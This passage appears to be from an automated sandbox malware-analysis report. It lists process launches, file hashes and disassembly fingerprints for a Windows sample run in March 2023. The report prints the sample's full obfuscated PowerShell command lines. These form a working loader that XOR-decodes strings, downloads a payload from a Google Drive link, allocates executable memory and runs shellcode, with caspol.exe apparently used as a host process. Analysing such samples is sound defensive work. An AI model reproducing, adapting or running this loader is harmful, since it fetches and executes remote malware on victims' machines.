BESiFMgFPrFSt1HoBPo2 KBPr7 TBAcB OBHa3whD CCumDCyFDiCMoFNoBUnBDiD DB DB S3PlCKe0PyD m2ReF L5OsEPaF FCHoBObEBlF SE a9MaC B6 HBNi7StBUnBHaCFr0spD S2 DF V5VeE FFwiC HB TEDeF SEan9 BC a6peB T7frBEjB mC R0 sD L2LeFId5AvEBuFPaCInBVrEMyFLuE C9OpCMa6 OB V7SaB sB ACUn0 PD M2CrFFo5 BEAfF BC SB BEslFPaE R9 KC P6UnB R7 PBNoB CC T0PeD C2 SF E5DeE BFKoC WBSkE FFLeEUl9StCNo6NiBUn2RuBUdBKaB R3 SC s0HoDSl2AaFHa5OsEdmF NCHuBTrE FFMaESt9AbCOm6 MB D2 FBMa2 GBGe2Ma'Sa;He& T(Gg`$DrELylToeOvvStaDit LoAnr dfSeoSk7 K)Ri R`$GuK To Mm PmCeaLnnSvd BrBek caAd2Fj; F`$ CK poMumPom Ta SnSpdanrInkLoavk3Sy Fu= v CeKInoMen Cs Ht V0Sp2Ju T'SiBZoFWoE E9DiFReEMoF E6ReFSl2SaE D8SuEOt8KaBFo5PrDVe2inFTi5 BEBoDVaF A4InFLm0PeFSkE SBUn3UnB SF LDSk6 WFUl4voFFl5MeFBaE FE L2ChEIn8EuF AAFiE UD PAAc9AtA LBTiA CCSiA S8 SB A7PaBSpF ID HFseF BE SEDo8CuEExFThBRu7SkBVmFPrC HEBlFLo5KuFSo9ToF I4 LFHiFsoESe2ScETu8 SFAs0SuB S7 hA sBSaBMa7SkA SBSaBOv2 F' F;Si&pi(To`$BiE blomeEuvFaaPat aoSprSkf Ko F7No)Hy Mu`$ FK AoMam SmVaa Pn Md FrChk FaKi3Sk# C;""";Function Kommandrka9 ([String]$Paatryknin201) { For($Spag=2; $Spag -lt $Paatryknin201.Length-1; $Spag+=(2+1)){$Konst = $Konst + $Paatryknin201.Substring($Spag, 1)}; $Konst;}$Jnkep0 = Kommandrka9 'WhI UEDuXRo ';$Jnkep1= Kommandrka9 $Boykott;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Po*er*\v1.0\*ll.e*e $Jnkep1 ;}else{&$Jnkep0 $Jnkep1;}
                            Imagebase:0x7ff606060000
                            File size:452608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:8
                            Start time:14:09:51
                            Start date:13/03/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff73a0b0000
                            File size:875008 bytes
                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:10
                            Start time:14:09:54
                            Start date:13/03/2023
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):
                            Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Konst02 { param([String]$Paatryknin201); $Fonetik134 = ''; Write-Host $Fonetik134; Write-Host $Fonetik134; Write-Host $Fonetik134; $Bdel222 = New-Object byte[] ($Paatryknin201.Length / 2); For($Spag=0; $Spag -lt $Paatryknin201.Length; $Spag+=2){ $Bdel222[$Spag/2] = [convert]::ToByte($Paatryknin201.Substring($Spag, 2), 16); $Bdel222[$Spag/2] = ($Bdel222[$Spag/2] -bxor 155); } [String][System.Text.Encoding]::ASCII.GetString($Bdel222);}$Demog0=Konst02 'C8E2E8EFFEF6B5FFF7F7';$Demog1=Konst02 'D6F2F8E9F4E8F4FDEFB5CCF2F5A8A9B5CEF5E8FAFDFED5FAEFF2EDFED6FEEFF3F4FFE8';$Demog2=Konst02 'DCFEEFCBE9F4F8DAFFFFE9FEE8E8';$Demog3=Konst02 'C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFD';$Demog4=Konst02 'E8EFE9F2F5FC';$Demog5=Konst02 'DCFEEFD6F4FFEEF7FED3FAF5FFF7FE';$Demog6=Konst02 'C9CFC8EBFEF8F2FAF7D5FAF6FEB7BBD3F2FFFED9E2C8F2FCB7BBCBEEF9F7F2F8';$Demog7=Konst02 'C9EEF5EFF2F6FEB7BBD6FAF5FAFCFEFF';$Demog8=Konst02 'C9FEFDF7FEF8EFFEFFDFFEF7FEFCFAEFFE';$Demog9=Konst02 'D2F5D6FEF6F4E9E2D6F4FFEEF7FE';$Elevatorfo0=Konst02 'D6E2DFFEF7FEFCFAEFFECFE2EBFE';$Elevatorfo1=Konst02 'D8F7FAE8E8B7BBCBEEF9F7F2F8B7BBC8FEFAF7FEFFB7BBDAF5E8F2D8F7FAE8E8B7BBDAEEEFF4D8F7FAE8E8';$Elevatorfo2=Konst02 'D2F5EDF4F0FE';$Elevatorfo3=Konst02 'CBEEF9F7F2F8B7BBD3F2FFFED9E2C8F2FCB7BBD5FEECC8F7F4EFB7BBCDF2E9EFEEFAF7';$Elevatorfo4=Konst02 'CDF2E9EFEEFAF7DAF7F7F4F8';$Elevatorfo5=Konst02 'F5EFFFF7F7';$Elevatorfo6=Konst02 'D5EFCBE9F4EFFEF8EFCDF2E9EFEEFAF7D6FEF6F4E9E2';$Elevatorfo7=Konst02 'D2DEC3';$Elevatorfo8=Konst02 'C7';$Vattppe=Konst02 'CEC8DEC9A8A9';$Deviledj=Konst02 'D8FAF7F7CCF2F5FFF4ECCBE9F4F8DA';function fkp {Param ($Kominternf, $Back) ;$Faggrupp0 =Konst02 'BFCDFAE9F6F9BBA6BBB3C0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DCFEEFDAE8E8FEF6F9F7F2FEE8B3B2BBE7BBCCF3FEE9FEB6D4F9F1FEF8EFBBE0BBBFC4B5DCF7F4F9FAF7DAE8E8FEF6F9F7E2D8FAF8F3FEBBB6DAF5FFBBBFC4B5D7F4F8FAEFF2F4F5B5C8EBF7F2EFB3BFDEF7FEEDFAEFF4E9FDF4A3B2C0B6AAC6B5DEEAEEFAF7E8B3BFDFFEF6F4FCABB2BBE6B2B5DCFEEFCFE2EBFEB3BFDFFEF6F4FCAAB2';&($Elevatorfo7) $Faggrupp0;$Faggrupp5 = Konst02 'BFDDF7FAFCFCFEF7BBA6BBBFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCA9B7BBC0CFE2EBFEC0C6C6BBDBB3BFDFFEF6F4FCA8B7BBBFDFFEF6F4FCAFB2B2';&($Elevatorfo7) $Faggrupp5;$Faggrupp1 = Konst02 'E9FEEFEEE9F5BBBFDDF7FAFCFCFEF7B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDC6B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDB3B3D5FEECB6D4F9F1FEF8EFBBD2F5EFCBEFE9B2B7BBB3BFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCAEB2B2B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3BFD0F4F6F2F5EFFEE9F5FDB2B2B2B2B7BBBFD9FAF8F0B2B2';&($Elevatorfo7) $Faggrupp1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicof,[Parameter(Position = 1)] [Type] $Medplanbli = [Void]);$Faggrupp2 = Konst02 'BFD0E9E2FFE8FDF2BBA6BBC0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DFFEFDF2F5FEDFE2F5FAF6F2F8DAE8E8FEF6F9F7E2B3B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5DAE8E8FEF6F9F7E2D5FAF6FEB3BFDFFEF6F4FCA3B2B2B7BBC0C8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5DEF6F2EFB5DAE8E8FEF6F9F7E2D9EEF2F7FFFEE9DAF8F8FEE8E8C6A1A1C9EEF5B2B5DFFEFDF2F5FEDFE2F5FAF6F2F8D6F4FFEEF7FEB3BFDFFEF6F4FCA2B7BBBFFDFAF7E8FEB2B5DFFEFDF2F5FECFE2EBFEB3BFDEF7FEEDFAEFF4E9FDF4ABB7BBBFDEF7FEEDFAEFF4E9FDF4AAB7BBC0C8E2E8EFFEF6B5D6EEF7EFF2F8FAE8EFDFFEF7FEFCFAEFFEC6B2';&($Elevatorfo7) $Faggrupp2;$Faggrupp3 = Konst02 'BFD0E9E2FFE8FDF2B5DFFEFDF2F5FED8F4F5E8EFE9EEF8EFF4E9B3BFDFFEF6F4FCADB7BBC0C8E2E8EFFEF6B5C9FEFDF7FEF8EFF2F4F5B5D8FAF7F7F2F5FCD8F4F5EDFEF5EFF2F4F5E8C6A1A1C8EFFAF5FFFAE9FFB7BBBFD6FEFFF2F8F4FDB2B5C8FEEFD2F6EBF7FEF6FEF5EFFAEFF2F4F5DDF7FAFCE8B3BFDFFEF6F4FCACB2';&($Elevatorfo7) $Faggrupp3;$Faggrupp4 = Konst02 'BFD0E9E2FFE8FDF2B5DFFEFDF2F5FED6FEEFF3F4FFB3BFDEF7FEEDFAEFF4E9FDF4A9B7BBBFDEF7FEEDFAEFF4E9FDF4A8B7BBBFD6FEFFEBF7FAF5F9F7F2B7BBBFD6FEFFF2F8F4FDB2B5C8FEEFD2F6EBF7FEF6FEF5EFFAEFF2F4F5DDF7FAFCE8B3BFDFFEF6F4FCACB2';&($Elevatorfo7) $Faggrupp4;$Faggrupp5 = Konst02 'E9FEEFEEE9F5BBBFD0E9E2FFE8FDF2B5D8E9FEFAEFFECFE2EBFEB3B2';&($Elevatorfo7) $Faggrupp5 ;}$Iranian = Konst02 'F0FEE9F5FEF7A8A9';$Faggrupp6 = Konst02 'BFDCF7EEF6EBF2BBA6BBC0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1DCFEEFDFFEF7FEFCFAEFFEDDF4E9DDEEF5F8EFF2F4F5CBF4F2F5EFFEE9B3B3FDF0EBBBBFD2E9FAF5F2FAF5BBBFDEF7FEEDFAEFF4E9FDF4AFB2B7BBB3DCDFCFBBDBB3C0D2F5EFCBEFE9C6B7BBC0CED2F5EFA8A9C6B7BBC0CED2F5EFA8A9C6B7BBC0CED2F5EFA8A9C6B2BBB3C0D2F5EFCBEFE9C6B2B2B2';&($Elevatorfo7) $Faggrupp6;$Unbodysk = fkp $Elevatorfo5 $Elevatorfo6;$Faggrupp7 = Konst02 'BFD6F4F5FEE2E8FAEDA9ABACA8BBA6BBBFDCF7EEF6EBF2B5D2F5EDF4F0FEB3C0D2F5EFCBEFE9C6A1A1C1FEE9F4B7BBADAEABB7BBABE3A8ABABABB7BBABE3AFABB2';&($Elevatorfo7) $Faggrupp7;$Faggrupp8 = Konst02 'BFDFFEE8EFBBA6BBBFDCF7EEF6EBF2B5D2F5EDF4F0FEB3C0D2F5EFCBEFE9C6A1A1C1FEE9F4B7BBACACACAAA8AFABA3B7BBABE3A8ABABABB7BBABE3AFB2';&($Elevatorfo7) $Faggrupp8;$Konst01 = 'https://drive.google.com/uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk';$Konst00 = Konst02 'BFD0F4F6F6FAF5FFE9F0FABBA6BBB3D5FEECB6D4F9F1FEF8EFBBD5FEEFB5CCFEF9D8F7F2FEF5EFB2B5DFF4ECF5F7F4FAFFC8EFE9F2F5FCB3BFD0F4F5E8EFABAAB2';$Faggrupp8 = Konst02 'BFD6F4F5FEE2E8FAEDA9ABACA9A6BFFEF5EDA1FAEBEBFFFAEFFA';&($Elevatorfo7) $Faggrupp8;$Moneysav2072=$Moneysav2072+'\Winet.Tec';$Kommandrka='';if (-not(Test-Path $Moneysav2072)) {while ($Kommandrka -eq '') {&($Elevatorfo7) $Konst00;&($Elevatorfo7) (Konst02 'C8EFFAE9EFB6C8F7FEFEEBBBAE');}Set-Content $Moneysav2072 $Kommandrka;}$Kommandrka = Get-Content $Moneysav2072;$Faggrupp9 = Konst02 'BFDDFAFCFCE9EEEBEBBBA6BBC0C8E2E8EFFEF6B5D8F4F5EDFEE9EFC6A1A1DDE9F4F6D9FAE8FEADAFC8EFE9F2F5FCB3BFD0F4F6F6FAF5FFE9F0FAB2';&($Elevatorfo7) $Faggrupp9;$Kommandrka0 = Konst02 'C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1D8F4EBE2B3BFDDFAFCFCE9EEEBEBB7BBABB7BBBBBFD6F4F5FEE2E8FAEDA9ABACA8B7BBADAEABB2';&($Elevatorfo7) $Kommandrka0;$Motor=$Faggrupp.count-650;$Kommandrka1 = Konst02 'C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1D8F4EBE2B3BFDDFAFCFCE9EEEBEBB7BBADAEABB7BBBFDFFEE8EFB7BBBFD6F4EFF4E9B2';&($Elevatorfo7) $Kommandrka1;$Kommandrka2 = Konst02 'BFE9FEF6F2E8E8BBA6BBC0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D6FAE9E8F3FAF7C6A1A1DCFEEFDFFEF7FEFCFAEFFEDDF4E9DDEEF5F8EFF2F4F5CBF4F2F5EFFEE9B3B3FDF0EBBBBFCDFAEFEFEBEBFEBBBFDFFEEDF2F7FEFFF1B2B7BBB3DCDFCFBBDBB3C0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B7BBC0D2F5EFCBEFE9C6B2BBB3C0D2F5EFCBEFE9C6B2B2B2';&($Elevatorfo7) $Kommandrka2;$Kommandrka3 = Konst02 'BFE9FEF6F2E8E8B5D2F5EDF4F0FEB3BFD6F4F5FEE2E8FAEDA9ABACA8B7BFDFFEE8EFB7BFCEF5F9F4FFE2E8F0B7ABB7ABB2';&($Elevatorfo7) $Kommandrka3#
                            Imagebase:
                            File size:433152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language

                            General

                            Target ID:13
                            Start time:14:10:12
                            Start date:13/03/2023
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                            Imagebase:0x9d0000
                            File size:108664 bytes
                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            Disassembly

                            Reset < >

                              Executed Functions

                              Function 00007FFD2BDD518E Relevance: .1, Instructions: 126COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.2214232761.00007FFD2BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD2BDD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ffd2bdd0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c7109a67ae880d789a2bb1708d11d772d8c4741502199ee010f58acc0c35a50
                              • Instruction ID: cf0295910a01dd7fc33ff2bd9cd2612374618de899ad58ffc83129cad5f9ed41
                              • Opcode Fuzzy Hash: 3c7109a67ae880d789a2bb1708d11d772d8c4741502199ee010f58acc0c35a50
                              • Instruction Fuzzy Hash: D841273170D7864FD35AEB2898A15E47BE1EF92314B0405BED0CAC71B7DA2AA846C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFD2BDD3BFC Relevance: .1, Instructions: 115COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.2214232761.00007FFD2BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD2BDD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ffd2bdd0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 41f0de2a2d61740a6604547bba3afd5a55a53f0dd25b4fdfee3772869bac4f08
                              • Instruction ID: 4ecdc474e8770507434c7ade153c1b73f6f170d11d4f41e2d804ae16f400a7e7
                              • Opcode Fuzzy Hash: 41f0de2a2d61740a6604547bba3afd5a55a53f0dd25b4fdfee3772869bac4f08
                              • Instruction Fuzzy Hash: 3A314C31B189098FDF58EB1CD895AE977E1FB98710F544169E00ED32A6CE65E882CBC1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFD2BDD3535 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.2214232761.00007FFD2BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD2BDD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ffd2bdd0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                              • Instruction ID: 1e52a4c374394df10419e2ad74d9de9aaf4670f6de643b7ee7c6dde35b344504
                              • Opcode Fuzzy Hash: 390b43d0d27606fcc6d81820381354590e1f2259c2c4aab3fcf2d16506637991
                              • Instruction Fuzzy Hash: 6001677125CB0C4FD748EF0CE451AA5B7E0FB95324F10056DE58AC3661DA36E881CB46
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFD2BDD524F Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000007.00000002.2214232761.00007FFD2BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD2BDD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ffd2bdd0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f066c1498d6048c08e7f96c9858a6fe890b77e60627ada7e0aa1494c5973c3c
                              • Instruction ID: 6eccb656ff4126e02a379abab4b7408b74c29d40d9a3b8e9d167640651caa1b5
                              • Opcode Fuzzy Hash: 3f066c1498d6048c08e7f96c9858a6fe890b77e60627ada7e0aa1494c5973c3c
                              • Instruction Fuzzy Hash: E6F0B43271CB058FDB5CEA0CF8529B973D1EBD5330F00022EF08BC22A2DA26E8428641
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00007FFD2BDD1A13 Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000007.00000002.2214232761.00007FFD2BDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD2BDD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_7_2_7ffd2bdd0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: (T_^
                              • API String ID: 0-2659705801
                              • Opcode ID: f513d0d932845ab6707e9e0730b020801767bf78557d0d50506fb01437d5533c
                              • Instruction ID: 98b673466dd7282897df554e4a69dc79c5431d773f938def9e1fb05746052e6f
                              • Opcode Fuzzy Hash: f513d0d932845ab6707e9e0730b020801767bf78557d0d50506fb01437d5533c
                              • Instruction Fuzzy Hash: 33A17A43B0F3D31AE743166D6CB60E53F60EF5766170A01F7C0D58B0A3AC5A289BC2A2
                              Uniqueness

                              Uniqueness Score: -1.00%